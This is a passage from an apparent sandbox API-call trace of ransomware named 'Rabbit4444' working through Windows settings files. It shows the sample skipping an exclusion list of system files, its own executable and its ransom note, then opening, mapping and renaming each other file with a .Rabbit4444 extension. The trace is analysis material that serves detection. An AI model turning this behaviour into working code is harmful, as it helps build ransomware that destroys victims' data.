returned="AAA_SystemSettings_Display_Duplicate.settingcontent-ms" [0057.253] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.254] lstrlenW (lpString="AAA_SystemSettings_Display_Duplicate.settingcontent-ms") returned 54 [0057.254] lstrlenW (lpString="Rabbit4444") returned 10 [0057.254] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.254] lstrlenW (lpString=".dll") returned 4 [0057.254] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.254] lstrlenW (lpString=".lnk") returned 4 [0057.254] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.254] lstrlenW (lpString=".ini") returned 4 [0057.254] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.254] lstrlenW (lpString=".sys") returned 4 [0057.254] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_duplicate.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.254] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.254] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14856497319) returned 1 [0057.254] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1227) returned 1 [0057.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.254] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.258] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.259] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14856980871) returned 1 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.259] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.259] CloseHandle (hObject=0x298) returned 1 [0057.259] CloseHandle (hObject=0x278) returned 1 [0057.259] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms.Rabbit4444") returned 182 [0057.259] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_duplicate.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_duplicate.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.260] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x272e44a2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x272e44a2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", cAlternateFileName="AA5F02~1.SET")) returned 1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2=".") returned 1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="..") returned 1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="windows") returned -1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.260] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.261] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="boot") returned -1 [0057.261] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.261] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.261] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms") returned="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms" [0057.261] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.261] lstrlenW (lpString="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms") returned 67 [0057.261] lstrlenW (lpString="Rabbit4444") returned 10 [0057.261] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.261] lstrlenW (lpString=".dll") returned 4 [0057.261] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.261] lstrlenW (lpString=".lnk") returned 4 [0057.261] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.261] lstrlenW (lpString=".ini") returned 4 [0057.261] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.261] lstrlenW (lpString=".sys") returned 4 [0057.261] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.261] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_identifydetectwireless.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.261] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.261] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14857221141) returned 1 [0057.262] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1292) returned 1 [0057.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.262] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.263] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.263] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.264] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14857464324) returned 1 [0057.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.264] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.264] CloseHandle (hObject=0x298) returned 1 [0057.264] CloseHandle (hObject=0x278) returned 1 [0057.264] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms.Rabbit4444") returned 195 [0057.264] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_identifydetectwireless.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_identifydetectwireless.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.265] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2737ce0e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2737ce0e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x511, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", cAlternateFileName="AA9A18~1.SET")) returned 1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.265] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.265] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms") returned="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms" [0057.265] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.266] lstrlenW (lpString="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms") returned 68 [0057.266] lstrlenW (lpString="Rabbit4444") returned 10 [0057.266] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.266] lstrlenW (lpString=".dll") returned 4 [0057.266] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.266] lstrlenW (lpString=".lnk") returned 4 [0057.266] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.266] lstrlenW (lpString=".ini") returned 4 [0057.266] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.266] lstrlenW (lpString=".sys") returned 4 [0057.266] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isautobrightnessenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.266] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.266] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14857715974) returned 1 [0057.266] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1297) returned 1 [0057.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.267] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.271] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.272] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14858274557) returned 1 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.272] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.272] CloseHandle (hObject=0x298) returned 1 [0057.272] CloseHandle (hObject=0x278) returned 1 [0057.272] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms.Rabbit4444") returned 196 [0057.272] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isautobrightnessenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isautobrightnessenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.273] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x274d4305, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x274d4305, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", cAlternateFileName="AA6264~1.SET")) returned 1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2=".") returned 1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="..") returned 1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="windows") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="boot") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.273] lstrcmpiW (lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.273] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms") returned="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms" [0057.274] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.274] lstrlenW (lpString="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms") returned 61 [0057.274] lstrlenW (lpString="Rabbit4444") returned 10 [0057.274] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.274] lstrlenW (lpString=".dll") returned 4 [0057.274] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.274] lstrlenW (lpString=".lnk") returned 4 [0057.274] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.274] lstrlenW (lpString=".ini") returned 4 [0057.274] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.274] lstrlenW (lpString=".sys") returned 4 [0057.274] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.274] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isrotationlocked.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.274] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.274] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14858510929) returned 1 [0057.274] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0057.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0057.275] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.276] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.277] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14858769159) returned 1 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0057.277] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.277] CloseHandle (hObject=0x298) returned 1 [0057.277] CloseHandle (hObject=0x278) returned 1 [0057.277] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms.Rabbit4444") returned 189 [0057.277] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isrotationlocked.settingcontent-ms"), 